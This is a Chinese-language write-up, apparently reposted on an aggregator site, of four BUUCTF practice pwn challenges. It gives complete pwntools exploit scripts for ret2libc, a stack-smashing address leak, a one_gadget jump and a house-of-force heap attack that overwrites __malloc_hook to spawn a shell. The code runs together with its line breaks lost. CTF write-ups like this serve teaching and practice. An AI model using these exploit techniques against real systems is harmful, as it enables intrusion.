PWN-PRACTICE-BUUCTF-24

• • cmcc_pwnme1
  • wdb2018_guess
  • oneshot_tjctf_2016
  • gyctf_2020_force

cmcc_pwnme1

棧溢出，ret2libc

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" io=remote("node4.buuoj.cn",27883) elf=ELF("./pwnme1") libc=ELF("./libc-2.23-16-x32.so") puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main=0x080486F4 #getflag=0x08048677 io.sendlineafter(">> 6. Exit \n","5") io.recvuntil("Please input the name of fruit:") payload="a"*(164+4)+p32(puts_plt)+p32(main)+p32(puts_got) io.sendline(payload) puts_addr=u32(io.recvuntil("\xf7")[-4:]) print("puts_addr"+hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] system=libc_base+libc.sym["system"] binsh=libc_base+libc.search("/bin/sh").next() io.sendlineafter(">> 6. Exit \n","5") io.recvuntil("Please input the name of fruit:") payload="a"*(164+4)+p32(system)+p32(main)+p32(binsh) io.sendline(payload) io.interactive()

wdb2018_guess

stack smashing，參考：wdb2018_guess stack smashing

# -*- coding:utf-8 -*- from pwn import * #io=process("./GUESS") io=remote("node4.buuoj.cn",25593) elf=ELF("./GUESS") libc=ELF("./libc-2.23-16-x64.so") puts_got=elf.got["puts"]io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(puts_got) io.sendline(payload) io.recvuntil("*** stack smashing detected ***: ") puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("puts_addr=="+hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] libc_environ=libc_base+libc.sym["__environ"]io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(libc_environ) io.sendline(payload) io.recvuntil("*** stack smashing detected ***: ") stack_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("stack_addr=="+hex(stack_addr))io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(stack_addr-0x168) io.sendline(payload)io.interactive()

oneshot_tjctf_2016

通過puts_got泄露puts的真實地址，計算libc基地址，進而計算one_gadget地址
發(fā)送one_gadget地址，程序跳轉執(zhí)行

from pwn import * #context.log_level='debug' #io=process('./oneshot_tjctf_2016') io=remote('node4.buuoj.cn',29453) elf=ELF('./oneshot_tjctf_2016') libc=ELF('./libc-2.23-x64.so') io.recvuntil('Read location?\n') io.sendline(str(elf.got['puts'])) io.recvuntil('0x0000') puts_addr=int(io.recvuntil('\n')[:-1],16) print(hex(puts_addr)) libc_base=puts_addr-libc.sym['puts'] onegadgets=[0x45216,0x4526a,0xf02a4,0xf1147] one_gadget=libc_base+onegadgets[0] io.recvuntil('Jump location?\n') io.sendline(str(one_gadget)) io.interactive()

gyctf_2020_force

house of force
參考：寒假訓練 gyctf_2020_force (2/250)

# -*- coding:utf-8 -*- from pwn import * #io=process("./gyctf_2020_force") io=remote("node4.buuoj.cn",26484) elf=ELF("./gyctf_2020_force") libc=ELF("./libc-2.23-16-x64.so")def add(size,content):io.sendlineafter("2:puts\n","1")io.sendlineafter("size\n",str(size))io.recvuntil("bin addr 0x")chunk_addr=int(io.recvuntil("\n")[:-1],16)io.sendlineafter("content\n",content)return chunk_addr#gdb.attach(io) #pause()addr0=add(0x200000,"aaaa")#當需要分配的chunk很大時，top chunk的size不能滿足需要，程序會使用mmap來分配chunk#由mmap分配的chunk的地址與libc的基址有著固定的偏移，于是可以計算libc的基址 libc_base=addr0+0x200ff0 malloc_hook=libc_base+libc.sym["__malloc_hook"] realloc=libc_base+libc.sym["realloc"] print("malloc_hook=="+hex(malloc_hook)) print("realloc=="+hex(realloc)) payload="a"*0x18+p64(0xffffffffffffffff)#將top chunk的size改寫成非常大的數(shù)，由于檢測時要轉換為無符號數(shù)，一般改寫成"-1" addr1=add(0x10,payload) top_chunk=addr1+0x10#top chunk的地址，是prev_size的其實地址，house of force必須知道top chunk的地址 print("top_chunk=="+hex(top_chunk)) offset=malloc_hook-top_chunk-0x33 #這里的0x33是為了使變化后的top chunk指向一個滿足字節(jié)對齊的地址，而且盡可能離目標地址近一些#pause()addr2=add(offset,"bbbb")#這里top chunk的地址還沒變，這個chunk還是在現(xiàn)在的top chunk指向的地址#從top chunk中分配chunk，會改變top chunk指向的地址，這里給一個偏移，然后top chunk就能指向離目標地址很近的一個滿足字節(jié)對齊的地址 print("addr2=="+hex(addr2))#pause()gadgets=[0x45216,0x4526a,0xf02a4,0xf1147] one_gadget=libc_base+gadgets[1] payload="a"*8+p64(one_gadget)+p64(realloc+0x10)#這里就是在新的top chunk指向的地址分配chunk了#小細節(jié)：__malloc_hook-8=__realloc_hook addr3=add(0x10,payload)#pause()io.sendlineafter("2:puts\n","1") io.sendlineafter("size\n",str(0x10))#這里的調(diào)用流程為:malloc->__malloc_hook->realloc+0x10(平衡棧，滿足one_gadget的條件)->__realloc_hookio.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-24的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。